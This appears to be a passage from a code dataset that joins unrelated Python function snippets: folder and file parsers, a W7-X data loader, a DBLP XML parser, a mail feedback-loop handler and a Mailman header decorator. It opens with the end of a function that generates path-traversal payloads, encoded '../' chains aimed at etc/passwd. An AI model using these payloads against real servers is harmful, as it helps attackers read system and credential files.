payloads.append([curr_file_path])\n\n #For extended file paths (Other UTF-8)\n list_of_postfix_utf8_encoded = ['','etc%25c0%25afpasswd']\n list_of_prefix_utf8_encoded = ['%25c0%25ae%25c0%25ae%25c0%25af']\n\n for post_style in list_of_postfix_utf8_encoded:\n for pre_style in list_of_prefix_utf8_encoded:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n #For extended file paths (Other UTF-8) 2\n list_of_postfix_utf8_encoded2 = ['','etc%c0%afpasswd']\n list_of_prefix_utf8_encoded2 = ['%c0%ae%c0%ae%c0%af']\n\n for post_style in list_of_postfix_utf8_encoded2:\n for pre_style in list_of_prefix_utf8_encoded2:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n # For extended file paths (Other UTF-8) 3\n '''\n list_of_postfix_utf8_encoded3 = ['','etc%u2215passwd']\n list_of_prefix_utf8_encoded3 = ['%uff0e%uff0e%u2215']\n\n for post_style in list_of_postfix_utf8_encoded3:\n for pre_style in list_of_prefix_utf8_encoded3:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n '''\n\n #For extended file paths (Other UTF-8) 4\n list_of_postfix_utf8_encoded4 = ['','etc%c0%2fpasswd']\n list_of_prefix_utf8_encoded4 = ['%c0%2e%c0%2e%c0%2f']\n\n for post_style in list_of_postfix_utf8_encoded4:\n for pre_style in list_of_prefix_utf8_encoded4:\n curr_file_path = 
post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n #For extended file paths (Other UTF-8) 5\n list_of_postfix_utf8_encoded5 = ['','etc%uEFC8passwd']\n list_of_prefix_utf8_encoded5 = ['..%uEFC8']\n\n for post_style in list_of_postfix_utf8_encoded5:\n for pre_style in list_of_prefix_utf8_encoded5:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n #For extended file paths (Hex)\n list_of_postfix_hex = ['']\n list_of_prefix_hex = ['0x2e0x2e0x2f']\n\n for post_style in list_of_postfix_hex:\n for pre_style in list_of_prefix_hex:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n #2-part Inputs\n list_of_second_input = ['passwd']\n\n #Do it with postfix_1 first\n for post_style in list_of_postfix_1:\n for second_input in list_of_second_input:\n payloads.append([post_style, second_input])\n\n #New Postfix array (Without the last '/')\n list_of_postfix_2 = ['etc','etc/']\n\n for second_input in list_of_second_input:\n for post_style in list_of_postfix_2:\n for pre_style in list_of_prefix:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n payloads.append([curr_file_path, second_input])\n\n return payloads", "def parse_folder(self, path):\n\n for filename in os.listdir(path):\n self.parse_file(os.path.join(path, filename), filename)\n return self.relations", "def try_fetch_local(input_data, bare_chan, time_range=None):\n for each_path in pyfusion.config.get('global', 'localdatapath').split('+'):\n # check for multi value shot number, e.g. utc bounds for W7-X data\n shot = input_data.shot\n # MDSplus style path to access sorted files into folders by shot\n path, patt = os.path.split(each_path)\n # print(patt)\n # Detect a a subdir code based on date/shot - half the chars are ~\n if len(patt) == 2*len(patt.replace('~','')): \n subdir = ''\n # Use the YYYYMMDD part if two components\n strshot = str(shot[0]) if len(np.shape(shot))>0 else str(shot)\n # print(strshot, patt, str(shot))\n if len(np.shape(shot)) == 0 and int(strshot[2:4]) <16:\n print(\"*******Warning {strshot} seems like an MDSplus shot or MDS test shot in YYMMDD form - see line 255\"\n .format(strshot=strshot))\n # reverse the order of both the pattern and the shot so 'a' posn is 0th char\n revshot = strshot[::-1]\n for i,ch in enumerate(patt):\n if (i%2) == 0: \n if ch != '~':\n raise LookupError(\"Can't parse {d} as a MDS style subdir\"\n .format(d=patt))\n continue\n if (ord(ch) - ord('a')) < len(revshot):\n subdir += revshot[ord(ch) - ord('a')]\n else:\n if pyfusion.VERBOSE>0:\n print('********** Are we working with MDSplus W7M test shot??? 
- \\n need a W7M test shot to check if this is really and error', shot)\n\n else:\n subdir = patt\n debug_(pyfusion.DEBUG, 4, key='MDSPlus style subdir ~path', msg=each_path)\n each_path = os.path.join(path, subdir)\n # implement shot[1] < 1 for MDSplus test shots - the only\n # sacrifice is that we can't use shot[1] 0 to be the latest\n # but we could still use shot =[0,0] to be the latest.\n\n # for now, allow - in file names - later we could replace '-' with 'M'\n if isinstance(shot, (tuple, list, ndarray)):\n shot_str = '{s0}_{s1}'.format(s0=shot[0], s1=shot[1])\n else:\n shot_str = str(shot)\n input_data.localname = os.path.join(each_path, '{shot}_{bc}.npz'\n .format(shot=shot_str, bc=bare_chan))\n # original - data_filename %filename_dict)\n files_exist = os.path.exists(input_data.localname)\n if pyfusion.VERBOSE>2: print('search', each_path, 'for', input_data.localname, ['No!','Found!'][files_exist])\n debug_(pyfusion.DEBUG, 3, key='try_local_fetch')\n if files_exist: \n intmp = np.any([st in input_data.localname.lower() for st in \n ['tmp', 'temp']]) # add anything you wish to warn about\n if pyfusion.VERBOSE>0 or intmp:\n if intmp: \n pyfusion.logging.warning('Using {f} in temporary directory!'\n .format(f=input_data.localname))\n print('found local data in {f}'. format(f=input_data.localname))\n break\n\n if not files_exist:\n return None\n\n signal_dict = newload(input_data.localname)\n \"\"\" These W7X-specific lines are here to deal with npz saved data\n See the W7X fetch.py for more info\n Examples of difficult shots.\n 'W7X_L53_LP01_U' shot_number=[20160309,13] 0.8.2b writes all zeros (when \n read by newload 0.9.92O clean,on both) even though the rawdim is OK up to 350,000\n L57 doesn't have this problem in 0.8.2b - written the same date! 
(but diff dimraw very fragmented)\n \"\"\"\n if 'params' not in signal_dict:\n signal_dict.update(dict(params=()))\n if 'params' in signal_dict and 'name' in signal_dict['params'] and 'W7X_L5' in signal_dict['params']['name']:\n if LooseVersion(signal_dict['params']['pyfusion_version']) < LooseVersion('0.6.8b'):\n raise ValueError('probe assignments in error LP11-22 in {fn}'\n .format(fn=input_data.localname))\n if np.nanmax(signal_dict['timebase']) == 0:\n pyfusion.logging.warning(\"======== all 0's: making a fake timebase for {fn}\"\n .format(fn=input_data.localname))\n signal_dict['timebase'] = 2e-6*np.cumsum(1.0 + 0*signal_dict['signal'])\n\n if np.diff(signal_dict['timebase'])[0] == 0: # first two are the same\n signal_dict['timebase'] = interpolate_corrupted_W7X_timebase(signal_dict)\n\n# if 'req_f_u' not in signal_dict['params']: # req_f_u was initially called seg_f_u (incorrectly)\n# signal_dict['params']['req_f_u'] = signal_dict['params']['shot_f']\n if 'utc_0' in signal_dict['params']:\n true_start = (signal_dict['params']['data_utc'][0] - signal_dict['params']['utc_0'])/1e9\n else:\n true_start = (signal_dict['params']['data_utc'][0] - signal_dict['params']['shot_f'])/1e9 - 61.0\n\n print('\\n base:.py ****True_start of timebase', true_start)\n delta_t = true_start - signal_dict['timebase'][0] \n # used to want timebase starting at zero - changed in 2020 - probably wrong for a long time.\n \n if np.abs(delta_t) > 1e-6:\n if LooseVersion(signal_dict['params']['pyfusion_version']) >= LooseVersion('0.9.94O'): #note the O!\n # not accessible here - if signal_dict['version'] >= 106:\n print('not adjusting')\n else:\n # Ideally the timebase in seconds should be 0 secs at t1 (diag trigger)\n print(\"=== correcting timebase which has not been adjusted to t=0 - discrepancy = {dt:.4g}\"\n .format(dt=delta_t))\n # Note that the relevant version is at the time of saving.\n signal_dict['timebase'] = signal_dict['timebase'] - delta_t\n \n\n coords = get_coords_for_channel(**input_data.__dict__)\n #ch = Channel(bare_chan, Coords('dummy', (0,0,0)))\n ch = Channel(bare_chan, coords)\n output_data = TimeseriesData(timebase=Timebase(signal_dict['timebase']),\n signal=Signal(signal_dict['signal']), channels=ch)\n # bdb - used \"fetcher\" instead of \"self\" in the \"direct from LHD data\" version\n # when using saved files, should use the name - not input_data.config_name\n # it WAS the config_name coming from the raw format.\n output_data.config_name = bare_chan\n # would be nice to get to the gain here - but how - maybe setup will get it\n output_data.meta.update({'shot':input_data.shot})\n if 'params' in signal_dict: \n output_data.params = signal_dict['params']\n if 'utc' in signal_dict['params']:\n output_data.utc = signal_dict['params'].get('utc',None)\n else:\n # yes, it seems like duplication, but no\n output_data.utc = None\n output_data.params = dict(comment = 'old npz file has no params')\n\n # If we are sub-selecting, the utc should be adjusted.\n if time_range is not None:\n origbnds = (output_data.timebase[[0,-1]]/1e-9).astype(np.float) # can't use min max as we want the ends\n output_data = output_data.reduce_time(time_range) # because reduce time can only copy now.\n # ***** this output_data.utc calc only works for non-nan timebase start and ends,\n # and only if the original output_data.utc is correct\n newbnds = (output_data.timebase[[0,-1]]/1e-9).astype(np.float)\n output_data.utc = [output_data.utc[i] + (newbnds[i] - origbnds[i]).round(0) for i in range(2)]\n 
print('output_data.utc', output_data.utc, newbnds, origbnds)\n\n oldsrc = ', originally from ' + output_data.params['source'] if hasattr(output_data, 'params') and 'source' in output_data.params else ''\n output_data.params.update(dict(source='from npz cache' + oldsrc))\n return(output_data)", "def parsefolder(arg, dirname, names):\n options, computer = arg\n\n names.sort()\n if options.verbose:\n print \"Parsing\", dirname\n for name in names:\n if not os.path.isfile(dirname+\"/\"+name):\n continue\n\n parsefile(dirname, name, options.files, computer)", "def _parse_dir(self):\r\n type_char = self._grab_type()\r\n user_name = self._grab_unascii() #This gets the user_name field for the DirEntity\r\n self._match(\"\\t\")\r\n selector = self._grab_unascii() #This gets the selector.\r\n self._match(\"\\t\")\r\n host = self._grab_host()\r\n self._match(\"\\t\")\r\n port = self._grab_port()\r\n self._match(\"\\r\\n\")\r\n return DirEntity(type_char, user_name, selector, host, port)", "def process_folder(\n self,\n user,\n folder_path,\n data_type,\n overwrite=False,\n extension=\"dat\",\n hugs_url=None,\n storage_url=None,\n ):\n from pathlib import Path\n data_type = data_type.upper()\n\n if data_type == \"GC\":\n filepaths = []\n # Find all files in\n for f in Path(folder_path).glob(\"*.C\"):\n if \"precisions\" in f.name:\n # Remove precisions section and ensure the matching data file exists\n data_filename = str(f).replace(\".precisions\", \"\")\n if Path(data_filename).exists():\n filepaths.append((Path(data_filename), f))\n else:\n filepaths = [f for f in Path(folder_path).glob(f\"**/*.{extension}\")]\n\n return self.process_files(\n user=user,\n files=filepaths,\n data_type=data_type,\n overwrite=overwrite,\n )", "def extract_conversations(output_dir, filename, conversation_separator = '======='):\n key_headers = tuple(['Visitor ID: ', 'Timestamp: '])\n with open(filename,'r') as f:\n for key, group in itertools.groupby(f, lambda line: line.startswith(conversation_separator)):\n if not key:\n group = list(group)\n conversation_key = list(get_key_headers(group, key_headers))\n filename = output_dir + '_'.join(reversed(conversation_key))\n with io.open(filename, 'w', encoding='utf-8') as output:\n conversation = remove_acc(list(extract_dialogue(group)))\n for item in conversation:\n output.write(\"%s\\n\" % item)", "def parse_file_list(self, file_path=None, file_name_id='Producer Granule ID', url_id='Online Access URLs'):\n\n # read in and maintain the raw csv file as df\n df = pd.read_csv(file_path)\n\n # record the number of files\n self.file_num = df.__len__()\n\n # initiate the data frame\n self.file_list = pd.DataFrame()\n self.file_list['download_dir'] = np.NaN\n self.file_list['file_name'] = df[file_name_id]\n self.file_list['online_url'] = df[url_id]\n self.file_list['status'] = 0\n self.file_list['year'] = 0\n self.file_list['day'] = 0\n self.file_list = self.file_list.reset_index(drop=True)\n\n # clean up the variables for a file list downloaded from Reverb\n # extract http urls from the file list\n print(\"Extracting http urls from the file list...\")\n self.file_list['online_url'] = self.file_list['online_url'].str.rstrip(\"\\'\").str.split(',').str[1]\n self.file_list['year'] = self.file_list['online_url'].str.split('/', expand=True).iloc[:, 7]\n self.file_list['day'] = self.file_list['online_url'].str.split('/', expand=True).iloc[:, 8]\n self.file_list['download_dir'] = self.download_dir + self.file_list['year'] + '/' + self.file_list['day'] + '/'", "def 
filings_dir(feedpath):\n\tsubdir = re.fullmatch(r'.*xbrlrss-(\\d{4}-\\d{2})\\.xml',os.path.basename(feedpath)).group(1)\n\treturn os.path.join(feed_tools.filings_dir,subdir)", "def parse(cls, raw_folder: str) -> Dict[str, Any]:\n folder_path = os.path.abspath(raw_folder)\n data = dict()\n files = os.listdir(folder_path)\n for file in files:\n if is_ignored(file):\n continue\n try:\n file = os.path.join(raw_folder, file)\n datum = cls.process_file(file)\n except FileNotCompatible:\n continue\n\n _, kwrd = os.path.split(file)\n kwrd = os.path.splitext(kwrd)[0]\n data[kwrd] = datum\n\n return data", "def _readcvcfolder(self):\n # Initialize\n scanrecinfo = ScanRecInfo()\n samptimeset = []\n freqset = []\n try:\n scanrecinfo.read_scanrec(self.filefolder)\n except Exception:\n warnings.warn(\"Could not read session header.\"\n +\" Will try filefolder name...\")\n try:\n obsfolderinfo = self._parse_cvcfolder(self.filefolder)\n except ValueError as er:\n print(er)\n scanrecinfo.scanrecparms = None\n else:\n spw = obsfolderinfo['rcumode']\n nqz = modeparms.rcumode2nyquistzone(spw)\n sbs = modeparms.seqarg2list(obsfolderinfo['subband'])\n freqspec_hi = modeparms.sb2freq(sbs[-1], nqz)\n scanrecinfo.set_scanrecparms(obsfolderinfo['datatype'],\n str(freqspec_hi),\n obsfolderinfo['duration_tot'],\n obsfolderinfo['pointing'],\n obsfolderinfo['integration'])\n scanrecinfo.scanrecparms['rcumode'] = spw\n scanrecinfo.set_stnid(obsfolderinfo['stnid'])\n scanrecinfo.calibrationfile = None\n print(\"Read in filefolder meta.\")\n # Select only data files in folder (avoid CalTable*.dat files)\n ls = os.listdir(self.filefolder)\n filenames = [filename for filename in ls if filename.endswith('.dat')\n and not filename.startswith('CalTable')]\n filenames.sort() # This enforces chronological order\n for cvcfile in filenames:\n cvcdim_t = (os.path.getsize(os.path.join(self.filefolder, cvcfile))\n // self.__get_cvc_dtype().itemsize)\n # Try to get obsfile header\n try:\n (bfilename, _dat) = cvcfile.split('.')\n ymd, hms, ldattype = bfilename.split('_', 2)\n if '_' in ldattype:\n ldattype, _rest = ldattype.split('_',1)\n hfilename = ymd+'_'+hms+'_'+ldattype+'.h'\n hfilepath = os.path.join(self.filefolder, hfilename)\n obsinfo = LDatInfo.read_ldat_header(hfilepath)\n scanrecinfo.add_obs(obsinfo)\n except:\n warnings.warn(\n \"Couldn't find a header file for {}\".format(cvcfile))\n _datatype, t_begin = self._parse_cvcfile(os.path.join(self.filefolder, cvcfile))\n\n # Compute time of each autocovariance matrix sample per subband\n integration = scanrecinfo.get_integration()\n obscvm_datetimes = [None] * cvcdim_t\n for t_idx in range(cvcdim_t):\n t_delta = datetime.timedelta(\n seconds=t_idx * integration\n )\n obscvm_datetimes[t_idx] = t_begin + t_delta\n samptimeset.append(obscvm_datetimes)\n\n # Compute frequency of corresponding time sample\n rcumode = scanrecinfo.get_rcumode()\n nz = modeparms.rcumode2nyquistzone(rcumode)\n if scanrecinfo.get_datatype() == 'acc':\n freqs = modeparms.rcumode2sbfreqs(rcumode)\n else:\n sb = obsinfo.sb\n freq = modeparms.sb2freq(sb, nz)\n freqs = [freq] * cvcdim_t\n freqset.append(freqs)\n return scanrecinfo, filenames, samptimeset, freqset", "def count_recipients(item_container):\n if item_container.item.string_1 != '':\n user_folder = get_item_container_by_path(item_container.item.string_1)\n return count_users_with_email(user_folder)\n else:\n while not check_userfolder(item_container):\n item_container = item_container.get_parent()\n return count_users_with_email(item_container)", 
"def _read_files(self) -> MMD:\n\t\theaders = []\n\t\tbodies = []\n\t\tif self.config.file_type == FileType.CSV:\n\t\t\tif self.config.source_uris.endswith('.zip'):\n\t\t\t\twith ZipFile(self.config.source_uris) as zf:\n\t\t\t\t\tfor item in zf.namelist():\n\t\t\t\t\t\tif item.endswith('.csv'):\n\t\t\t\t\t\t\t# with zf.open(item, 'r') as infile:\n\t\t\t\t\t\t\tcsv_reader = csv.reader(TextIOWrapper(zf.open(item, 'r'), 'utf-8'))\n\t\t\t\t\t\t\theaders.append(next(csv_reader))\n\t\t\t\t\t\t\t# need to find a more efficient way, the csv reader is a generator that can only be used once\n\t\t\t\t\t\t\tbodies.append(list(csv_reader))\n\t\t\telif self.config.source_uris.endswith('.csv'):\n\t\t\t\tfor uri in self.config.source_uris:\n\t\t\t\t\tif uri.endswith('.csv'):\n\t\t\t\t\t\tcsv_reader = csv.reader(open(uri, newline='', encoding='utf-8'))\n\t\t\t\t\t\theaders.append(next(csv_reader))\n\t\t\t\t\t\tbodies.append(list(csv_reader))\n\t\telif self.config.file_type == FileType.CNSCHEMA:\n\t\t\theader = ['@id', 'label_@language', 'label_@value']\n\t\t\tbody = []\n\t\t\twith open(self.config.source_uris, 'r') as load_f:\n\t\t\t\tload_dict = json.load(load_f)\n\t\t\t\theader.extend(load_dict['@context'].keys())\n\t\t\t\theader = [h for h in header if h not in ['label', 'range', 'domain', 'subClassOf']]\n\t\t\t\ttmp_h = [h for h in header if h not in ['@id', '@language', '@value']]\n\t\t\t\tfor item in load_dict['@graph']:\n\t\t\t\t\tif item['@id'].split('/')[-2] == 'resource':\n\t\t\t\t\t\trow = [item['@id'], item['label']['@language'], item['label']['@value']]\n\t\t\t\t\t\tfor h in tmp_h:\n\t\t\t\t\t\t\tif h in item:\n\t\t\t\t\t\t\t\trow.append(item[h])\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\trow.append(None)\n\t\t\t\t\t\tbody.append(tuple(row))\n\t\t\theaders.append(tuple(header))\n\t\t\tbodies.append(body)\n\t\telif self.config.file_type == FileType.OPENBASE:\n\t\t\theader = []\n\t\t\tbody = []\n\t\t\twith open(self.config.source_uris, 'r') as load_f:\n\t\t\t\tfor line in load_f:\n\t\t\t\t\trow = []\n\t\t\t\t\tflat_line = flatten_json(json.loads(line))\n\t\t\t\t\tfor key in flat_line:\n\t\t\t\t\t\tif key not in header:\n\t\t\t\t\t\t\theader.append(key)\n\t\t\t\t\tfor h in header:\n\t\t\t\t\t\tif h in flat_line:\n\t\t\t\t\t\t\trow.append(flat_line[h])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\trow.append(None)\n\t\t\t\t\tbody.append(row)\n\t\t\tfor item in body:\n\t\t\t\tif len(item) < len(header):\n\t\t\t\t\titem.extend([None for i in range(len(header) - len(item))])\n\t\t\theaders.append(tuple(header))\n\t\t\tbodies.append(tuple([tuple(item) for item in body]))\n\t\telif self.config.file_type == FileType.OPENKS:\n\t\t\t# knowledge graph dataset loading \n\t\t\tif os.path.exists(self.config.source_uris + '/entities') and os.path.exists(self.config.source_uris + '/triples'):\n\t\t\t\theaders = [['entities'], ['triples']]\n\t\t\t\tfor file in ['entities', 'triples']:\n\t\t\t\t\ttmp = []\n\t\t\t\t\twith open(self.config.source_uris + '/' + file, 'r') as load_f:\n\t\t\t\t\t\tfor line in load_f:\n\t\t\t\t\t\t\ttmp.append(tuple([item.strip() for item in line.split('\\t')]))\n\t\t\t\t\t\tbodies.append(tuple(tmp))\n\t\t\t# general text dataset loading\n\t\t\telif os.path.exists(self.config.source_uris + '/train') and os.path.exists(self.config.source_uris + '/valid'):\n\t\t\t\theaders = [['train'], ['valid']]\n\t\t\t\tfor file in ['train', 'valid']:\n\t\t\t\t\ttmp = []\n\t\t\t\t\twith open(self.config.source_uris + '/' + file, 'r') as load_f:\n\t\t\t\t\t\tfor line in 
load_f:\n\t\t\t\t\t\t\ttmp.append(tuple([item.strip() for item in line.split('@@')]))\n\t\t\t\t\t\tbodies.append(tuple(tmp))\n\t\t\telse:\n\t\t\t\tlogger.warn('Only allows loading with entities and triples for now!')\n\t\t\t\traise IOError\n\t\telif self.config.file_type == FileType.NERO:\n\t\t\theaders = [['unlabeled_data'], ['predict'], ['pattern']]\n\t\t\tfor file in ['unlabeled_data', 'predict', 'pattern']:\n\t\t\t\ttmp = []\n\t\t\t\twith open(self.config.source_uris + '/' + file + '.json', 'r') as load_f:\n\t\t\t\t\tfor line in load_f:\n\t\t\t\t\t\ttmp.append(line.strip())\n\t\t\t\t\tbodies.append(tuple(tmp))\n\n\t\tmmd.name = self.config.data_name\n\t\tmmd.headers = headers\n\t\tmmd.bodies = bodies\n\t\treturn mmd", "def pull_data(self, sub_folder): \n\n data = self.data_interface.load_files_subdirect(sub_folder)\n\n return data", "def load_fvcom_files(filepath=None,casename=None,ncname=None,neifile=None):\n\n currdir=os.getcwd()\n os.chdir(filepath)\n\n data=_load_grdfile(casename)\n\n data.update(_load_depfile(casename))\n \n data.update(_load_spgfile(casename))\n\n data.update(_load_obcfile(casename))\n\n data.update(_load_llfiles(casename))\n\n if ncname!=None:\n data.update(_load_nc(ncname))\n\n if neifile!=None:\n data.update(loadnei(neifile))\n\n os.chdir(currdir)\n\n return data", "def parse_folder(file_folder: str) -> Tuple[list, list, list]:\n\n raw_files = [\n _\n for _ in os.listdir(file_folder)\n if _.lower().endswith(\".raw\") or _.lower().endswith(\".d\") or _.lower().endswith(\".mzml\")\n ]\n fasta_files = [_ for _ in os.listdir(file_folder) if _.lower().endswith(\".fasta\")]\n db_files = [\n _ for _ in os.listdir(file_folder) if _.lower().endswith(\".db_data.hdf\")\n ]\n\n return raw_files, fasta_files, db_files", "def collect_data(self, data_folder):\n print(\"Start collecting\")\n input_file_path = os.path.join(data_folder, \"dblp.xml\")\n with codecs.open(input_file_path, \"r\", encoding=\"iso-8859-1\") as file:\n start = time.time()\n tmp = start\n\n title = \"\"\n key_prefix = \"\"\n authors = []\n personal_information = False\n publications_type = [\"article\", \"inproceedings\", \"proceedings\", \"book\",\n \"incollection\", \"phdthesis\", \"mastersthesis\"]\n start_publication_regex = r\"<([^\\/]*?) 
(.*)>\" # </article><article mdate=\"2017-05-28\" key=\"journals/acta/Simon83\">\n end_publication_regex = r\"<\\/(.*?)>\" # </article><article mdate=\"2017-05-28\" key=\"journals/acta/Simon83\">\n author_regex = r\"<author>(.*)</author>\" # <author>Katsuyuki Tateishi</author>\n title_regex = r\"<title>(.*)</title>\" # <title>A quadratic speedup theorem ...</title>\n start_person_regex = r'<www.*key=\"(.*)\">' #<www mdate=\"2009-06-10\" key=\"homepages/32/3977\">\n end_person_regex = r\"<\\/www>\"\n note_url_regex = r\"<note.*?>|<url.*?>\"\n inside_publication = False\n inside_person = False\n for i, line in tqdm(enumerate(file)):\n # Test end of publication, if true add publication\n result = regex.search(end_publication_regex, line)\n if result:\n if result.group(1) in publications_type:\n if inside_publication and authors and title:\n # This a a publication, lets add it to the dictionnay author -> title\n self.__add_publication(authors, title)\n title = \"\"\n authors = []\n inside_publication = False\n personal_information = False\n key_prefix = \"\"\n\n #Test beginning of a publication\n result = regex.search(start_publication_regex, line)\n if result and result.group(1) in publications_type:\n inside_publication = True\n title = \"\"\n authors = []\n personal_information = False\n key_prefix = \"\"\n\n #Check if author\n result = regex.search(author_regex, line)\n if result and (inside_publication or inside_person):\n authors.append(result.group(1))\n #Check if title\n result = regex.search(title_regex, line)\n if result and (inside_publication or inside_person):\n title = result.group(1)\n #Check if containt url or note\n result = regex.search(note_url_regex, line)\n if result:\n #if inside_person and (\"<note\" in line or \"<url\" in line):\n personal_information = True\n # Check if end of person, if true add author\n result = regex.search(end_person_regex, line)\n if result and inside_person:\n if authors and \"homepages/\" in key_prefix and title == \"Home Page\":\n self.__add_author(key_prefix, authors, personal_information)\n key_prefix = \"\"\n authors = []\n inside_person = False\n personal_information = False\n title = \"\"\n #Check start person\n result = regex.search(start_person_regex, line)\n if result:\n inside_person = True\n key_prefix = result.group(1)\n\n\n self.__save_everything(data_folder)\n self.__merge_data()\n self.__save_everything(data_folder)", "def _parse_recurring_father_days(days_to_countries,filename=fathers_days_recurring):\n\n\n with open(filename,'r') as f:\n for line in f:\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('*'):\n date = line[2:]\n else:\n days_to_countries[date].append(line)", "def parse_identifying_data(path, passwd, embedded_file='participants.txt'):\n if path is not None:\n zf = zipfile.ZipFile(path)\n zf.setpassword(passwd)\n\n participants = {}\n for l in zf.read(embedded_file).splitlines():\n if l.startswith('#'):\n continue\n\n bc, name = l.strip().split('\\t')[:2]\n participants[bc] = name.replace(\",\", \"\")\n\n print \"Using identified data!\"\n else:\n participants = None\n\n return participants", "def loadFiles(root=\"data/TAIWAN_RAW_DATA/ADHD\"):\n\tdata_rt = [] # realtime.csv\n\tdata_trial = [] # trialdata.csv\n\tdata_id = [] # caseid/subjectid\n\tRealTime = \"A2RealTime_\"\n\tTrialData = \"A2TrialData_\"\n\tfolder_list = os.listdir(root) # list of subfolders in the root\n\tfor folders in folder_list:\n\t\tfolders_path = os.path.join(root,folders)\n\t\tif 
folders.find(\"pass\") != -1:\n\t\t\tcontinue\n\t\t\t\n\t\ttry:\n\t\t\tdata_rt.append(pd.read_csv(os.path.join\n\t\t\t\t\t\t\t\t (folders_path,\n\t\t\t\t\t\t\t\t RealTime+folders[3:]+\".csv\")))\n\t\t\tdata_trial.append(pd.read_csv(os.path.join\n\t\t\t\t\t\t\t\t\t (folders_path,\n\t\t\t\t\t\t\t\t\t TrialData+folders[3:]+\".csv\")))\n\t\t\tdata_id.append(int(folders.split('_')[1]))\n\t\texcept:\n\t\t\tprint(os.path.join(folders_path,TrialData+folders[3:]+\".csv\"))\n\t\t\t\n\treturn data_rt,data_trial,data_id,folder_list", "def handle_fbl(message, vendor=None, host=None):\n logger.debug('Got FBL vendor=%s host=%s', vendor, host)\n #logger.debug('message=%s', message)\n #logger.debug('message_type=%s', type(message))\n\n \"\"\"\n ARF is acronym-speak for three standardized MIME sections:\n 1) Generic message from FBL vendor\n - \"This is an abuse report\", etc\n 2) Generic information about abuse report\n - Contains some info, but not enough to be useful.\n 3) Copy of the original message\n - Some providers ALTER the original message, say:\n * Removal of Return-Path\n So keep that in mind. So far Message-ID has been untouched.\n \"\"\"\n\n # Convert to email.message.Message\n msg = message.to_message()\n # Get body\n body = msg.get_payload()\n # Yank out the original message\n try:\n original_msg = body[2].get_payload()[0]\n except AttributeError, e:\n logger.error('Could not parse FBL as ARF: %s', e)\n return\n\n #campaign_uuid = str(original_msg.get('List-Id'))\n #m = re.match(r'^[a-f\\d]{8}-([a-f\\d]{4}-){3}[a-f\\d]{12}$', campaign_uuid, re.IGNORECASE)\n #if not campaign_uuid or not m:\n # logger.error(\"FBL report original message does not contain a valid List-Id header: %s\", campaign_uuid)\n # return\n #campaign_uuid = uuid.UUID(campaign_uuid)\n #logger.debug('campaign_uuid=%s', campaign_uuid)\n\n list_index = str(original_msg.get('List-Id'))\n # TODO This regex doesn't belong here. 
It will be forgotten about.\n m = re.match(r'^([a-f\\d]{8,64})-(\\d{1,8})$', list_index, re.IGNORECASE)\n if not list_index or not m:\n logger.error(\"FBL report original message does not contain a valid List-Id header: %s\", list_index)\n return\n campaign_pk, r_index = m.groups()\n r_index = int(r_index)\n logger.debug('campaign_pk=%s, r_index=%s', campaign_pk, r_index)\n\n campaign = get_campaign('emails', pk=campaign_pk)\n r = campaign.recipients[r_index]\n logger.info(\"Got FBL for Campaign %s: %s (vendor=%s)\", campaign, r.email, vendor)\n r.append_log(fbl=True, blocked=True, msg=\"FBL report from vendor: %s\" % vendor)\n\n #logger.debug('original_msg=%s', original_msg)\n #logger.debug('original_msg_repr=%s', original_msg.__repr__())\n\n return_path = original_msg.get('Return-Path')\n message_id = original_msg.get('Message-Id')\n logger.debug('return_path=%s, message_id=%s', return_path, message_id)", "def process(mlist, msg, msgdata):\n # Digests and Mailman-craft messages should not get additional headers.\n if msgdata.get('isdigest') or msgdata.get('nodecorate'):\n return\n d = {}\n member = msgdata.get('member')\n if member is not None:\n # Calculate the extra personalization dictionary.\n recipient = msgdata.get('recipient', member.address.original_email)\n d['member'] = formataddr(\n (member.subscriber.display_name, member.subscriber.email))\n d['user_email'] = recipient\n d['user_delivered_to'] = member.address.original_email\n d['user_language'] = member.preferred_language.description\n d['user_name'] = member.display_name\n # For backward compatibility.\n d['user_address'] = recipient\n # Calculate the archiver permalink substitution variables. This provides\n # the $<archive-name>_url placeholder for every enabled archiver.\n for archiver in IListArchiverSet(mlist).archivers:\n if archiver.is_enabled:\n # Get the permalink of the message from the archiver. Watch out\n # for exceptions in the archiver plugin.\n try:\n archive_url = archiver.system_archiver.permalink(mlist, msg)\n except Exception:\n alog.exception('Exception in \"{}\" archiver'.format(\n archiver.system_archiver.name))\n archive_url = None\n if archive_url is not None:\n placeholder = '{}_url'.format(archiver.system_archiver.name)\n d[placeholder] = archive_url\n # These strings are descriptive for the log file and shouldn't be i18n'd\n d.update(msgdata.get('decoration-data', {}))\n header = decorate('list:member:regular:header', mlist, d)\n footer = decorate('list:member:regular:footer', mlist, d)\n # Escape hatch if both the footer and header are empty or None.\n if len(header) == 0 and len(footer) == 0:\n return\n # Be MIME smart here. We only attach the header and footer by\n # concatenation when the message is a non-multipart of type text/plain.\n # Otherwise, if it is not a multipart, we make it a multipart, and then we\n # add the header and footer as text/plain parts.\n #\n # BJG: In addition, only add the footer if the message's character set\n # matches the charset of the list's preferred language. This is a\n # suboptimal solution, and should be solved by allowing a list to have\n # multiple headers/footers, for each language the list supports.\n #\n # Also, if the list's preferred charset is us-ascii, we can always\n # safely add the header/footer to a plain text message since all\n # charsets Mailman supports are strict supersets of us-ascii --\n # no, UTF-16 emails are not supported yet.\n #\n # TK: Message with 'charset=' cause trouble. 
